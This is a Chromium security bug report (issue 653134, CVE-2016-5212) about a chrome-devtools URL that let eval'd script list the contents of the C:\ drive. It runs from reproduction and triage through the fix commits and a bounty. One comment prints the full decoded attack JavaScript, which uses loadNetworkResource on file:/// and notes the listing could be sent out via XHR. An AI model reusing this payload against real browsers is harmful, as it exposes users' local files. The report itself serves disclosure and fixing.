New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Oct 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 653134: Security: chrome-devtools protocol allows to read the content of C:\ drive

Reported by chromium...@gmail.com, Oct 5 2016

Issue description

VERSION
Chrome Version: 55.0.2880.4 canary (64-bit)
Operating System: Windows 7

REPRODUCTION CASE
1. Navigate to the link below.
2. As you can see the page displays the content of C:\ drive.
 
devtools-link.txt
1.7 KB View Download
Recording.mp4
1022 KB View Download

Comment 1 by elawrence@chromium.org, Oct 5 2016

Components: Platform>DevTools
Summary: Security: chrome-devtools protocol allows to read the content of C:\ drive (was: Security: Devtools allows to read the content of C:\ drive)
The repro calls chrome devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(attackcode)

where attack code works out to be:
function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();elsef();

This would be interesting if the data in question could be leaked (e.g. instead of document.writing it in text, it instead sent it to a remote server via XHR).

Level of exploitability depends on whether or not Chrome is willing to navigate to such a link in markup or as the source of an IFRAME or whether the attacker needs to convince the user to navigate to it via the address bar.

Comment 2 by tsepez@chromium.org, Oct 5 2016

Labels: Security_Severity-Medium Security_Impact-Stable
Owner: dgozman@chromium.org
Status: Assigned (was: Unconfirmed)
Exfiltration seems likely, which would make this severity high.
But it appears to require navigation [It would be a bug in itself if web content could open devtools schemes], dropping to medium.

Comment 3 by mea...@chromium.org, Oct 5 2016

FWIW it's possible to navigate to chrome-devtools schemes from extensions. This means an extension with no permissions will be able to read disk contents.

Comment 4 by tsepez@chromium.org, Oct 5 2016

Labels: -Security_Severity-Medium Security_Severity-High OS-All

Comment 5 by tsepez@chromium.org, Oct 5 2016

Labels: M-53 Pri-1

Comment 6 by sheriffbot@chromium.org, Oct 13 2016

Project Member
Labels: -M-53 M-54

Comment 7 by chromium...@gmail.com, Oct 17 2016

Any updates on this bug?

Comment 8 by dgozman@chromium.org, Oct 17 2016

Status: Started (was: Assigned)
The patch is under review.

Comment 9 by bugdroid1@chromium.org, Oct 17 2016

Project Member

Comment 10 by bugdroid1@chromium.org, Oct 17 2016

Project Member

Comment 11 by chromium...@gmail.com, Oct 19 2016

Verified on 56.0.2894.0 (Windows). Fixed.

Comment 12 by dgozman@chromium.org, Oct 24 2016

Labels: M-55 Merge-Request-55
Looks like this didn't introduce regressions in canary for a weak. Requesting merge to M55.

Comment 13 by dimu@chromium.org, Oct 24 2016

Labels: -Merge-Request-55 Merge-Approved-55 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M55 (branch: 2883)

Comment 14 by sheriffbot@chromium.org, Oct 25 2016

Project Member
Status: Fixed (was: Started)
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 15 by bugdroid1@chromium.org, Oct 25 2016

Project Member
Labels: -merge-approved-55 merge-merged-2883
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

commit 528c2bce2ece070826a84392d66169ffe33afdcd
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Oct 25 18:53:53 2016

Merge to 2883 "[DevTools] Move sanitize url to devtools_ui.cc."
> [DevTools] Move sanitize url to devtools_ui.cc.
>
> Compatibility script is not reliable enough.
>
> BUG= 653134 
>
> Review-Url: https://codereview.chromium.org/2403633002
> Cr-Commit-Position: refs/heads/master@{#425814}
(cherry picked from commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4)
TBR=pfeldman

Review URL: https://codereview.chromium.org/2444423002 .

Cr-Commit-Position: refs/branch-heads/2883@{#289}
Cr-Branched-From: 614d31daee2f61b0180df403a8ad43f20b9f6dd7-refs/heads/master@{#423768}

[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/test/BUILD.gn
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Comment 16 by sheriffbot@chromium.org, Oct 26 2016

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 17 by awhalley@chromium.org, Oct 27 2016

Labels: reward-topanel

Comment 18 by bugdroid1@chromium.org, Oct 27 2016

Project Member
Labels: merge-merged-2840
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

commit 528c2bce2ece070826a84392d66169ffe33afdcd
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Oct 25 18:53:53 2016

Merge to 2883 "[DevTools] Move sanitize url to devtools_ui.cc."
> [DevTools] Move sanitize url to devtools_ui.cc.
>
> Compatibility script is not reliable enough.
>
> BUG= 653134 
>
> Review-Url: https://codereview.chromium.org/2403633002
> Cr-Commit-Position: refs/heads/master@{#425814}
(cherry picked from commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4)
TBR=pfeldman

Review URL: https://codereview.chromium.org/2444423002 .

Cr-Commit-Position: refs/branch-heads/2883@{#289}
Cr-Branched-From: 614d31daee2f61b0180df403a8ad43f20b9f6dd7-refs/heads/master@{#423768}

[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/test/BUILD.gn
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Comment 19 by dimu@google.com, Nov 4 2016

Labels: -merge-merged-2840
[Automated comment] removing mislabelled merge-merged-2840

Comment 20 by awhalley@chromium.org, Nov 7 2016

Labels: -Hotlist-Merge-Approved

Comment 21 by awhalley@chromium.org, Nov 7 2016

Labels: -reward-topanel reward-unpaid reward-3000

Comment 22 by awhalley@chromium.org, Nov 7 2016

Congratulations, the panel awarded $3,000 for this report!

Comment 23 by awhalley@chromium.org, Nov 7 2016

Labels: -reward-unpaid reward-inprocess

Comment 24 by awhalley@chromium.org, Nov 29 2016

Labels: Release-0-M55

Comment 25 by awhalley@chromium.org, Jan 4 2017

Labels: CVE-2016-5212

Comment 26 by sheriffbot@chromium.org, Jan 31 2017

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 27 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment